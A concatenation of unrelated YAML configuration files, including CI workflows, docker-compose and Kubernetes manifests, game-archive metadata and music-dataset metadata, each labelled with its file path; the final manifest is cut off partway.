docker_openshift_prometheus_operator_image: coreos-prometheus-operator
docker_openshift_prometheus_config_reload_namespace: docker.io/tripleomaster
docker_openshift_prometheus_config_reload_image: coreos-prometheus-config-reloader
docker_openshift_kube_rbac_proxy_namespace: docker.io/tripleomaster
docker_openshift_kube_rbac_proxy_image: coreos-kube-rbac-proxy
docker_openshift_kube_state_metrics_namespace: docker.io/tripleomaster
docker_openshift_kube_state_metrics_image: coreos-kube-state-metrics
deploy_steps_ansible_workflow: true
config_download_args: >-
-e {{ working_dir }}/config-download.yaml
--disable-validations
--verbose
composable_roles: true
overcloud_roles:
- name: Controller
CountDefault: 1
tags:
- primary
- controller
networks:
- External
- InternalApi
- Storage
- StorageMgmt
- Tenant
- name: Compute
CountDefault: 0
tags:
- compute
networks:
- External
- InternalApi
- Storage
- StorageMgmt
- Tenant
# Tempest configuration, keep always at the end of the file
# Run tempest in containers when at least undercloud is containerized
tempest_format: >-
{% if containerized_undercloud|bool -%}
container
{%- else -%}
packages
{%- endif -%}
# If `run_tempest` is `true`, run tempests tests, otherwise do not
# run them.
tempest_config: false
test_ping: false
run_tempest: false
|
config/general_config/featureset033.yml
|
param:
## Sensing params
T: 1 # Duration of sensing needed for one estimate
fs_audio: 16000 # sampling frequency [Hz]
channels: 1 # channels
## Battery params
battery_charge: 2100 # battery capacity - AA NiMH [mAh]
battery_n: 1 # amount of batteries used
battery_efficiency: 0.8 # battery efficiency
battery_V: 2.2 # battery voltage
battery_joules: battery_n * battery_charge*battery_efficiency * battery_V * 3600 # [mJ]
## Processing architecture
S: 16 # Precision/word size [bit]
Eop: 500*10^(-9) # [mJ] # GPP
# Eop: 100*10^(-9) # [mJ] # DSP
# Eop: 10*10^(-9) # [mJ] # ASIP
# Eop: 1*10^(-9) # [mJ] # ASIC
c: [2, 1, 1, 8, 1, 2, 25] # [c_mac, c_add, c_mul, c_div, c_cmp, c_exp, c_log] (Table 2) >> [MAC, ADD, Multiplication, Division, Comparator, e^x, log], GPP/DSP
# c: [1, 1, 1, 1, 1, 1, 1] # [c_mac, c_add, c_mul, c_div, c_cmp, c_exp, c_log] (Table 2) >> [MAC, ADD, Multiplication, Division, Comparator, e^x, log], ASIP/ASIC
## Memory specific parameters
memacc_c: [4, 3, 3, 3, 3, 2, 2] # Amount of memory accesses for each operation
nr_mem: 3 # Number of memory options available
Ema: [100*10^(-12), 100*10^(-9), 100*10^(-9)] # Energy per memory access, [on-chip SRAM, off-chip SRAM, off-chip DRAM] [mJ/bit] (Table 2)
Ems: [50*10^(-9), 10*10^(-9), 75*10^(-9)] # Energy memory leakage, [on-chip SRAM, off-chip SRAM, off-chip DRAM] [mW/bit] (Table 2)
stand_mem: 2 # standard memory id where everything should be stored (in case not provided by feat/classf config)
stand_mem_ow: 0 # Overwrite used memory for the entire processing layer config [true/false]
stand_outsave: 1 # standard setting if output of layer is stored in-place or not [true/false].
stand_outacc: 1 # standard setting of how many mem accesses of a certain operation are comming from data of prev layer
## Other
macid: 1 # operation category index ids [MAC, ADD, Multiplication, Division, Comparator, e^x, log], multiply-acc
addid: 2 # addition id
multid: 3 # multiplication id
divid: 4 # division id
compid: 5 # comparator
expid: 6 # exponential
logid: 7 # logarithm
nr_arop: 7 # number of arithmetic operations
chid: 1 # dimension index ids, channel
featid: 2 # feature id
frameid: 3 # time id
nr_dimensions: 3 #total dimensions
|
general/params/default.yaml
|
version: "3.4"
services:
server:
image: ${DEEPHAVEN_SERVER_IMAGE}
# For jprofiler, replace the line before this comment block with the line below:
#build:
# context: ./jprofiler-server
# args:
# - DEEPHAVEN_SERVER_IMAGE=${DEEPHAVEN_SERVER_IMAGE}
environment:
# https://bugs.openjdk.java.net/browse/JDK-8230305
# cgroups v2 resource reservations only work w/ java 15+ ATM, so it's best for our java processes to be explicit
# with max memory.
#
# To turn on debug logging, add: -Dlogback.configurationFile=logback-debug.xml
- JAVA_TOOL_OPTIONS=-Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
#
# For remote debugging switch the line above for the one below (and also change the ports below)
# - JAVA_TOOL_OPTIONS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
#
# For jprofiler sessions (if you tweaked the jprofiler version in jprofiler-server/Dockerfile you need to tweak path)
# - JAVA_TOOL_OPTIONS=-agentpath:/opt/jprofiler13.0/bin/linux-x64/libjprofilerti.so=port=8849,nowait -Xmx4g -Ddeephaven.console.type=${DEEPHAVEN_CONSOLE_TYPE} -Ddeephaven.application.dir=${DEEPHAVEN_APPLICATION_DIR}
expose:
- '8080'
# For remote debugging (change if using different port)
# ports:
# - '5005:5005'
# For jprofiler (change if using different port)
# ports:
# - '8849:8849'
# Note: using old-style volume mounts, so that the directories get created if they don't exist
# See https://docs.docker.com/storage/bind-mounts/#differences-between--v-and---mount-behavior
volumes:
- ./data:/data
deploy:
resources:
limits:
cpus: '4.0'
# Allows the querying of this process jinfo/jmap
# docker-compose exec server jmap -heap 1
# docker-compose exec server jinfo 1
#
# Add NET_ADMIN to allow throttling network speeds
# $ docker exec -it core_server_1 apt-get install iproute2
# $ docker exec core_server_1 tc qdisc add dev eth0 root netem delay 10ms
cap_add:
- SYS_PTRACE
web:
image: deephaven/web:local-build
expose:
- "80"
volumes:
- ./data:/data
deploy:
resources:
limits:
cpus: '1'
memory: 256M
# Should only be used for non-production deployments, see grpc-proxy/README.md for more info
grpc-proxy:
image: deephaven/grpc-proxy:local-build
environment:
- BACKEND_ADDR=server:8080
expose:
- '8080'
# - '8443' #unused
deploy:
resources:
limits:
cpus: '1'
memory: 256M
envoy:
# A reverse proxy configured for no SSL on localhost. It fronts the requests
# for the static content and the websocket proxy.
image: deephaven/envoy:local-build
ports:
- "${DEEPHAVEN_PORT}:10000"
# - '9090:9090' #envoy admin
deploy:
resources:
limits:
cpus: '1'
memory: 256M
|
docker-compose-common.yml
|
name: GitHub clones counter for 14 days at every 8 hours and clones accumulator
on:
schedule:
- cron: "0 */8 * * *"
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
jobs:
traffic-clones:
runs-on: ubuntu-latest
env:
traffic_clones_json: traffic/clones.json
traffic_clones_accum_json: traffic/clones-accum.json
steps:
- name: allocate directories
run: |
mkdir $GITHUB_WORKSPACE/gh-workflow $GITHUB_WORKSPACE/gh-stats
- name: checkout gh-workflow
uses: actions/checkout@v2
with:
repository: 'andry81/gh-workflow'
path: gh-workflow
- name: checkout gh-stats
uses: actions/checkout@v2
with:
repository: 'andry81/tacklebar--external_tools--gh-stats'
path: gh-stats
token: ${{ secrets.SECRET_TOKEN }}
- name: request traffic clones json
run: |
curl --user "${{ github.actor }}:${{ secrets.SECRET_TOKEN }}" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/repos/andry81/tacklebar--external_tools/traffic/clones \
> "$GITHUB_WORKSPACE/gh-stats/$traffic_clones_json"
- name: accumulate traffic clones
shell: bash
run: |
cd $GITHUB_WORKSPACE/gh-stats
chmod ug+x $GITHUB_WORKSPACE/gh-workflow/bash/github/accum-traffic-clones.sh
$GITHUB_WORKSPACE/gh-workflow/bash/github/accum-traffic-clones.sh
- name: commit gh-stats
run: |
cd $GITHUB_WORKSPACE/gh-stats
git add .
git config --global user.name "GitHub Action"
git config --global user.email "<EMAIL>"
git commit -m "Automated traffic/clones update"
- name: push gh-stats
uses: ad-m/github-push-action@master
with:
repository: 'andry81/tacklebar--external_tools--gh-stats'
directory: gh-stats
github_token: ${{ secrets.SECRET_TOKEN }}
|
.github/workflows/tacklebar-gh-clone-stats.yml
|
matrix:
include:
- name: 'Unit Tests'
language: python
python: 3.6
script:
- git clone --depth 1 https://github.com/per1234/inoliblist.git "${TRAVIS_BUILD_DIR}/../inoliblist"
- python "${TRAVIS_BUILD_DIR}/tests/test_inolibbuglist.py" --ghtoken $GITHUB_TOKEN --github_login per1234 --browser_command "\"/c/Program Files/Mozilla Firefox/firefox.exe\" -new-tab" --arduino_ci_script_branch master --arduino_ci_script_application_folder "${HOME}" --arduino_ci_script_arduino_ide_version "1.8.6"
- name: 'PEP8 Compliance Check'
language: python
python: 3.6
before_install:
- pip install pycodestyle
script:
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -name '*.py' -exec pycodestyle {} +
- name: 'File Formatting Checks'
language: minimal
script:
# Check for UTF-8 BOM file encoding
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -exec grep --files-with-matches --binary-files=without-match $'\xEF\xBB\xBF' '{}' \; -exec echo 'UTF-8 BOM encoding detected.' \; -exec false '{}' +
# Check for files starting with a blank line
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'head -1 "$0" | grep --binary-files=without-match --regexp="^$"; if [[ "$?" == "0" ]]; then echo "Blank line found at start of $0."; false; fi'
# Check for tabs
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or \( -not -name '*.csv' -and -type f \) -exec grep --with-filename --line-number --binary-files=without-match --regexp=$'\t' '{}' \; -exec echo 'Tab found.' \; -exec false '{}' +
# Check for trailing whitespace
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or \( -not -name '*.csv' -and -type f \) -exec grep --with-filename --line-number --binary-files=without-match --regexp='[[:blank:]]$' '{}' \; -exec echo 'Trailing whitespace found.' \; -exec false '{}' +
# Check for non-Unix line endings
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -exec grep --files-with-matches --binary-files=without-match --regexp=$'\r$' '{}' \; -exec echo 'Non-Unix EOL detected.' \; -exec false '{}' +
# Check for blank lines at end of files
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'tail -1 "$0" | grep --binary-files=without-match --regexp="^$"; if [[ "$?" == "0" ]]; then echo "Blank line found at end of $0."; false; fi'
# Check for files that don't end in a newline (https://stackoverflow.com/a/25686825)
- find "${TRAVIS_BUILD_DIR}" -path "${TRAVIS_BUILD_DIR}/.git" -prune -or -type f -print0 | xargs -0 -L1 bash -c 'if test "$(grep --files-with-matches --binary-files=without-match --max-count=1 --regexp='.*' "$0")" && test "$(tail --bytes=1 "$0")"; then echo "No new line at end of $0."; false; fi'
- name: 'Spell Check'
language: python
python: 3.6
before_install:
- pip install codespell
script:
- codespell --skip="${TRAVIS_BUILD_DIR}/.git" --ignore-words="${TRAVIS_BUILD_DIR}/etc/codespell-ignore-words-list.txt" "${TRAVIS_BUILD_DIR}"
notifications:
email:
on_success: always
on_failure: always
webhooks:
urls:
# Use TravisBuddy to automatically comment on any pull request that results in a failed CI build
- https://www.travisbuddy.com/
on_success: never
on_failure: always
|
.travis.yml
|
name: check
on:
push:
pull_request:
schedule:
- cron: '0 8 * * *'
jobs:
lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/setup-python@v2
- name: set PY
run: echo "::set-env name=PY::$(python -c 'import hashlib, sys;print(hashlib.sha256(sys.version.encode()+sys.executable.encode()).hexdigest())')"
- uses: actions/cache@v2
with:
path: ~/.cache/pre-commit
key: pre-commit|${{ env.PY }}|${{ hashFiles('.pre-commit-config.yaml') }}
- uses: pre-commit/action@v1.1.0
test:
name: test ${{ matrix.py }} - ${{ matrix.os }}
runs-on: ${{ matrix.os }}-latest
strategy:
fail-fast: false
matrix:
os:
- Ubuntu
py:
- 3.8
- 3.7
- 3.6
steps:
- name: install OS dependencies
run: |
${{ runner.os == 'Linux' && 'sudo apt-get update -y && sudo apt-get install libavro-dev pkg-config' || true}}
shell: bash
- name: setup python for tox
uses: actions/setup-python@v2
with:
python-version: 3.8
- name: install tox
run: python -m pip install tox
- uses: actions/checkout@v2
- name: setup python for test ${{ matrix.py }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.py }}
- name: pick environment to run
run: |
import subprocess; import json
major, minor, impl = json.loads(subprocess.check_output(["python", "-c", "import json; import sys; import platform; print(json.dumps([sys.version_info[0], sys.version_info[1], platform.python_implementation()]));"], universal_newlines=True))
print('::set-env name=TOXENV::' + ("py" if impl == "CPython" else "pypy") + ("{}{}".format(major, minor) if impl == "CPython" else ("3" if major == 3 else "")))
shell: python
- name: setup test suite
run: tox -vv --notest
- name: run test suite
run: tox --skip-pkg-install
env:
PYTEST_ADDOPTS: "-vv --durations=20"
CI_RUN: 'yes'
DIFF_AGAINST: HEAD
- name: rename coverage report file
run: |
import os; os.rename('.tox/coverage.{}.xml'.format(os.environ['TOXENV']), '.tox/coverage.xml')
shell: python
- uses: codecov/codecov-action@v1
with:
file: ./.tox/coverage.xml
flags: tests
name: ${{ matrix.py }} - ${{ matrix.os }}
|
.github/workflows/check.yml
|
---
_id: dc350b20-1c08-11e8-a0fe-3ffbe97072a6
benchmark:
id: 7a
version: '0'
data:
- name: run_time
values:
- sim_time: '17985.32'
wall_time: '17986'
- name: memory_usage
values:
- unit: KB
value: '1229176'
- description: Using 2^-13 for time step size
format:
parse:
L2: number
grid: number
type: csv
name: spatial
transform:
- as: x
expr: datum.grid
type: formula
- as: y
expr: datum.L2
type: formula
type: line
url: https://gist.githubusercontent.com/wd15/c7cbecda6798c9a1cbecedf5fabea7dd/raw/cc87e95b1c7f770fcaa02468f09659018d1258b6/gistfile1.txt
- description: Using 2^-10 for dx and dy.
format:
parse:
L2: number
step: number
type: csv
name: temporal
transform:
- as: x
expr: datum.step
type: formula
- as: y
expr: datum.L2
type: formula
type: line
url: https://raw.githubusercontent.com/narutse/phasefield/master/data/FBEtimeL2.csv
- description: loglog plot of spatial convergence
name: spatialplot
type: image
url: https://raw.githubusercontent.com/narutse/phasefield/master/plots/FBEspace.png
- description: loglog plot of time convergence
name: temporalplot
type: image
url: https://raw.githubusercontent.com/narutse/phasefield/master/plots/FBEtime.png
date: 1519768501
layout: post
metadata:
author:
email: <EMAIL>
first: Narut
github_id: narutse
last: Sereewattanawoot
hardware:
acc_architecture: none
clock_rate: '4.6'
cores: '1'
cpu_architecture: x86_64
nodes: '1'
parallel_model: serial
implementation:
container_url: ''
name: custom
repo:
url: https://github.com/narutse/phasefield
version: 376a50252e28de3f9a415d7b1e8e6b0e762367ff
summary: Spatial and temporal convergence data for my serial version with first-order
in time, second-order in space Euler method. I treat non-linear terms explicitly,
but linear terms implicitly in order to measure time convergence. (Spatial error
will dominate with purely explicit Euler everywhere it's stable.) Will parallelize
for the later parts of this problem.
timestamp: 23 February, 2018
|
_data/simulations/Forward_Backward_Euler/meta.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2019-10-11 09:30"
game: "Unreal"
name: "SP-DontShootTheChest1"
author: "Tobby \"GTD-Carthage\" Ong"
description: "None"
releaseDate: "2014-02"
attachments: []
originalFilename: "SP-DontShootTheChest1_v100.7z"
hash: "c8078604fd5d0f40072b0c7b227cc13d149b935e"
fileSize: 11999913
files:
- name: "Marine.uax"
fileSize: 1688796
hash: "c512729e25ed1a6793c9496cf2d2d092b82aaff6"
- name: "caitsith.umx"
fileSize: 162282
hash: "17f798a4ece34a33519148b66317ee1e11d00fbf"
- name: "Sky.utx"
fileSize: 4228486
hash: "76f55cbb2d7a17ec74e59636831413edb3cd8c8a"
- name: "UPak.u"
fileSize: 11571933
hash: "1edea32a13f6ac09ab91ee673fb52317344acb88"
- name: "SP-DontShootTheChest1.unr"
fileSize: 15420297
hash: "dd64735755d7e9f229610117e95be0598768e9e8"
- name: "UPakFonts.utx"
fileSize: 3325182
hash: "b196151004470c64d872ef8895dd176d2b4778b6"
- name: "UPakFix.u"
fileSize: 46931
hash: "40e0c76c2b09d07611efdc263c35e7cb364d9abc"
otherFiles: 1
dependencies:
SP-DontShootTheChest1.unr:
- status: "MISSING"
name: "Emitter"
- status: "OK"
name: "caitsith"
- status: "OK"
name: "sky"
downloads:
- url: "https://www.newbiesplayground.net/download/maps/coop_maps/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal/Maps/Single%20Player/D/c/8/078604/SP-DontShootTheChest1_v100.7z"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Single Player"
title: "Under Deldaram"
playerCount: "Unknown"
themes:
Nali Temple: 0.8
Natural: 0.1
Nali Castle: 0.1
bots: true
|
content/Unreal/Maps/Single Player/D/c/8/078604/sp-dontshootthechest1_[c8078604].yml
|
--- !<SKIN>
contentType: "SKIN"
firstIndex: "2018-12-26 00:28"
game: "Unreal Tournament"
name: "He-Man"
author: "Unknown"
description: "None"
releaseDate: "2000-11"
attachments: []
originalFilename: "motuskinsv1.zip"
hash: "a32ed57703a6a9c960b5e6a702622fa01919fbe2"
fileSize: 4665242
files:
- name: "Soldierskins-hisssnake.utx"
fileSize: 798156
hash: "140dea0324aee1095dfe438977430f999fb4ab05"
- name: "SGirlskins-teela.utx"
fileSize: 1241428
hash: "21baf2f7e6ce008091fd3935ebfb9708b119e8c0"
- name: "Soldierskins-rio.utx"
fileSize: 798154
hash: "1a40903fdbdeb42b14fac85738c916a6d3a21075"
- name: "soldierskins-mane.utx"
fileSize: 1241410
hash: "13a8c5cf39fdd7b4f893e0202180abcf8ffc65c1"
- name: "soldierskins-buzzoff.utx"
fileSize: 1152762
hash: "ef1237d7a2a4d131ca775bc4e4db2d5ad4d3754a"
- name: "Soldierskins-He-Ro.utx"
fileSize: 1330081
hash: "4b3225b016346b885b654ff8b6fa8923dd1ec67b"
- name: "soldierskins-roboto.utx"
fileSize: 1418743
hash: "d6f48ec32863fa34290522b7971a34e5130e73a4"
- name: "soldierskins-skeletor.utx"
fileSize: 1241414
hash: "d8faa7d99e1f385a745c8c10225efa80b4b76a52"
- name: "Soldierskins-heman.utx"
fileSize: 1241425
hash: "92151c60ca7261c35271cf26e271c22e4e3313f7"
- name: "soldierskins-beasstman.utx"
fileSize: 1152766
hash: "6e765316be3426dba2dc187fdf387fa4ab9d8ad5"
otherFiles: 11
dependencies: {}
downloads:
- url: "https://gamefront.online/files2/service/thankyou?id=1420064"
main: false
repack: false
state: "MISSING"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Skins/H/motuskinsv1.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Skins/SkinsM/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Skins/Misc/SkinsM/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Skins/SkinPacks/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Skins/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Skins/H/a/3/2ed577/motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "http://ut-files.com/index.php?dir=Skins/SkinsM/&file=motuskinsv1.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Skins/H/a/3/2ed577/motuskinsv1.zip"
main: false
repack: false
state: "OK"
deleted: false
skins:
- "He-Man"
- "Man-E-Faces"
- "Roboto"
- "BeastMan"
- "King Hiss"
- "Skeletor"
- "Teela"
- "He-Ro"
- "RioBlast"
- "Buzzoff"
faces:
- "Human"
- "Monster"
- "Robot"
- "Team Blue"
- "Team Gold"
- "Team Green"
- "Team Red"
- "Beast Man"
- "With Pupils"
- "Hiss"
- "Snake Green"
- "Normal "
- "Team Blue"
- "Team Green"
- "Team Red"
- "Evil Twin"
model: "Unknown"
teamSkins: true
|
content/Unreal Tournament/Skins/H/a/3/2ed577/he-man_[a32ed577].yml
|
name: "Grid.ai Run Artifact"
inputs:
# required
script-name:
required: true
default: "run.py"
type: string
description: "The name of the script to run"
script-dir:
required: false
default: "${GITHUB_WORKSPACE}"
type: string
description: "Directory where the script is at"
# optional
cluster-name:
required: false
default: ""
type: string
description: "Arguments to grid run command"
grid-args:
required: false
default: "--localdir --instance_type t2.medium --dependency_file requirements.txt"
type: string
description: "Arguments to grid run command"
script-args:
required: false
default: ""
type: string
description: "Arguments to the script"
success-status:
required: false
default: "succeeded"
type: string
description: "grid run status text for successful execution"
outputs:
obj-type:
value: ${{ steps.gridai-obj-status.outputs.obj-type }}
description: "object id searched for"
obj-id:
value: ${{ steps.gridai-obj-status.outputs.obj-id }}
description: "object id searched for"
obj-status:
value: ${{ steps.gridai-obj-status.outputs.obj-status }}
description: "comma delimited status all of objects. ex: succeeded,succeeded,stopped"
obj-tally:
value: ${{ steps.gridai-obj-status.outputs.obj-tally }}
description: "comma delimited tally status codes. ex: 2 succeeded,1 stopped"
obj-summary:
value: ${{ steps.gridai-obj-status.outputs.obj-summary }}
description: "comma delimited unique status codes. ex: succeeded,stopped"
obj-exit-code:
value: ${{ steps.gridai-obj-status.outputs.obj-exit-code }}
description: "0 if exited finding the supplied status, 1 otherwise"
runs:
using: "composite"
steps:
- run: |
cd ${{ inputs.script-dir }}
pwd
shell: bash
- run: |
cd ${{ inputs.script-dir }}
grid run ${{ inputs.cluster-name }} ${{ inputs.grid-args }} ${{ inputs.script-name }} ${{ inputs.script-args }} | tee grid.run.log
export run_name=$(cat grid.run.log | awk -F: '$1=/grid_name/ {print $2}' | tr -s '[:blank:]')
echo "run_name=${run_name}" >> $GITHUB_ENV
if [[ -z "${run_name}" ]]; then
echo "Error: 'grid_name:[run_name]' not found in output"
exit 1
fi
shell: bash
- id: gridai-obj-status
uses: gridai-actions/gridai-status@main
with:
obj-type: run
obj-id: ${run_name}
- run: |
if [ -z "$(echo ${{ steps.gridai-obj-status.outputs.obj-summary }} | grep '${{ inputs.success-status }}')" ]; then
exit 1
fi
shell: bash
- run: |
cd ${{ inputs.script-dir }}
pwd
grid artifacts ${{ env.run_name }}
if [[ $? != 0 ]]; then
echo "Error: ${run_name} artifacts not found"
exit 1
fi
find grid_artifacts -type f -print | sort
shell: bash
|
action.yml
|
album: Shaking Through Volume 3
artist: Strand of Oaks
composer:
- <NAME>
excerpt: 'no'
genre: Pop
has_bleed: 'no'
instrumental: 'no'
mix_filename: StrandOfOaks_Spacestation_MIX.wav
origin: Weathervane Music
producer:
- <NAME>
raw_dir: StrandOfOaks_Spacestation_RAW
stem_dir: StrandOfOaks_Spacestation_STEMS
stems:
S01:
component: bass
filename: StrandOfOaks_Spacestation_STEM_01.wav
instrument: electric bass
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_01_01.wav
instrument: electric bass
S02:
component: ''
filename: StrandOfOaks_Spacestation_STEM_02.wav
instrument: vocalists
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_02_01.wav
instrument: female singer
R02:
filename: StrandOfOaks_Spacestation_RAW_02_02.wav
instrument: female singer
R03:
filename: StrandOfOaks_Spacestation_RAW_02_03.wav
instrument: male singer
S03:
component: ''
filename: StrandOfOaks_Spacestation_STEM_03.wav
instrument: drum set
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_03_01.wav
instrument: drum set
R02:
filename: StrandOfOaks_Spacestation_RAW_03_02.wav
instrument: drum set
R03:
filename: StrandOfOaks_Spacestation_RAW_03_03.wav
instrument: drum set
R04:
filename: StrandOfOaks_Spacestation_RAW_03_04.wav
instrument: kick drum
R05:
filename: StrandOfOaks_Spacestation_RAW_03_05.wav
instrument: drum set
R06:
filename: StrandOfOaks_Spacestation_RAW_03_06.wav
instrument: drum set
R07:
filename: StrandOfOaks_Spacestation_RAW_03_07.wav
instrument: snare drum
R08:
filename: StrandOfOaks_Spacestation_RAW_03_08.wav
instrument: snare drum
R09:
filename: StrandOfOaks_Spacestation_RAW_03_09.wav
instrument: toms
R10:
filename: StrandOfOaks_Spacestation_RAW_03_10.wav
instrument: toms
S04:
component: melody
filename: StrandOfOaks_Spacestation_STEM_04.wav
instrument: male singer
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_04_01.wav
instrument: male singer
S05:
component: ''
filename: StrandOfOaks_Spacestation_STEM_05.wav
instrument: auxiliary percussion
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_05_01.wav
instrument: shaker
R02:
filename: StrandOfOaks_Spacestation_RAW_05_02.wav
instrument: tambourine
S06:
component: ''
filename: StrandOfOaks_Spacestation_STEM_06.wav
instrument: piano
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_06_01.wav
instrument: piano
R02:
filename: StrandOfOaks_Spacestation_RAW_06_02.wav
instrument: piano
R03:
filename: StrandOfOaks_Spacestation_RAW_06_03.wav
instrument: piano
R04:
filename: StrandOfOaks_Spacestation_RAW_06_04.wav
instrument: piano
S07:
component: ''
filename: StrandOfOaks_Spacestation_STEM_07.wav
instrument: synthesizer
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_07_01.wav
instrument: synthesizer
S08:
component: melody
filename: StrandOfOaks_Spacestation_STEM_08.wav
instrument: tack piano
raw:
R01:
filename: StrandOfOaks_Spacestation_RAW_08_01.wav
instrument: tack piano
R02:
filename: StrandOfOaks_Spacestation_RAW_08_02.wav
instrument: tack piano
title: Spacestation
version: 1.2
website:
- www.shakingthrough.com/strandofoaks
|
medleydb/data/Metadata/StrandOfOaks_Spacestation_METADATA.yaml
|
name: Test BlueGraph
on:
pull_request:
push:
branches:
- master
- github-action-test
jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [ 3.7, 3.8 ]
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
- name: Get Neo4j from a third party repo and install
run: |
sudo add-apt-repository -y ppa:openjdk-r/ppa
sudo apt-get update
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable latest' | sudo tee -a /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
sudo add-apt-repository universe
sudo apt-get install neo4j=1:4.3.1
- name: Download the graph data science lib
run: |
wget https://s3-eu-west-1.amazonaws.com/com.neo4j.graphalgorithms.dist/graph-data-science/neo4j-graph-data-science-1.6.1-standalone.zip
unzip neo4j-graph-data-science-1.6.1-standalone.zip
sudo cp neo4j-graph-data-science-1.6.1.jar /var/lib/neo4j/plugins/
- name: Add conda to system path
run: |
# $CONDA is an environment variable pointing to the root of the miniconda directory
echo $CONDA/bin >> $GITHUB_PATH
- name: Useful for debugging any issues with conda
run: conda info -a
- name: Update the base env with graph-tool and faiss-gpu installed from conda-forge
run: |
conda install python=${{ matrix.python-version }}
conda env update --file test-environment.yml --name base
- name: Install the rest of the dependencies
run: |
python3 -m pip install .[dev]
- name: Configure the Neo4j database
run: |
sudo neo4j-admin set-initial-password <PASSWORD>
echo 'dbms.connector.bolt.listen_address=0.0.0.0:7687' | sudo tee -a /etc/neo4j/neo4j.conf
echo 'dbms.security.procedures.unrestricted=gds.*' | sudo tee -a /etc/neo4j/neo4j.conf
echo 'dbms.security.procedures.whitelist=gds.*' | sudo tee -a /etc/neo4j/neo4j.conf
cat /etc/neo4j/neo4j.conf
- name: Start a db instance and wait (it takes time to start)
run: |
sudo service neo4j restart
sleep 60
- name: Test with pytest
run: |
pytest --cov=./bluegraph
- name: Upload to codecov
if: ${{matrix.python-version == '3.7'}}
uses: codecov/codecov-action@v1
with:
fail_ci_if_error: false
files: ./coverage.xml
flags: pytest
name: "bluegraph-py37"
|
.github/workflows/test.yml
|
apiVersion: v1
kind: ConfigMap
metadata:
name: spinnaker-demo-config
namespace: ${parameters["namespace"]}
data:
NEW_FEATURE: "false"
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: spinnaker-demo
namespace: ${parameters["namespace"]}
labels:
##
# Nome da aplicação
app: spinnaker
##
# Equipe responsável pela aplicação. (operators, developers, supports)
team: developers
##
# Camada que a aplicação pertence. (frontend, backend, database)
tier: frontend
##
# O estágio ou fase em que a aplicação se encontra. (development, staging, qa, canary, production)
phase: ${parameters["phase"]}
##
# O número da versão. (por exemplo, 1.0.0)
version: ${parameters["version"]}
##
# Ambiente em que a aplicação está implantada. (development, staging, production)
environment: ${parameters["environment"]}
spec:
replicas: 2
selector:
matchLabels:
app: spinnaker
template:
metadata:
labels:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
spec:
containers:
- name: primary
image: ${parameters["image"]}
ports:
- containerPort: 8000
readinessProbe:
httpGet:
path: /
port: 8000
envFrom:
- configMapRef:
name: spinnaker-demo-config
---
kind: Service
apiVersion: v1
metadata:
name: spinnaker-demo
namespace: ${parameters["namespace"]}
spec:
type: ClusterIP
selector:
app: spinnaker
team: developers
tier: frontend
phase: ${parameters["phase"]}
version: ${parameters["version"]}
environment: ${parameters["environment"]}
ports:
- name: http
protocol: TCP
port: 8000
targetPort: 8000
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
annotations:
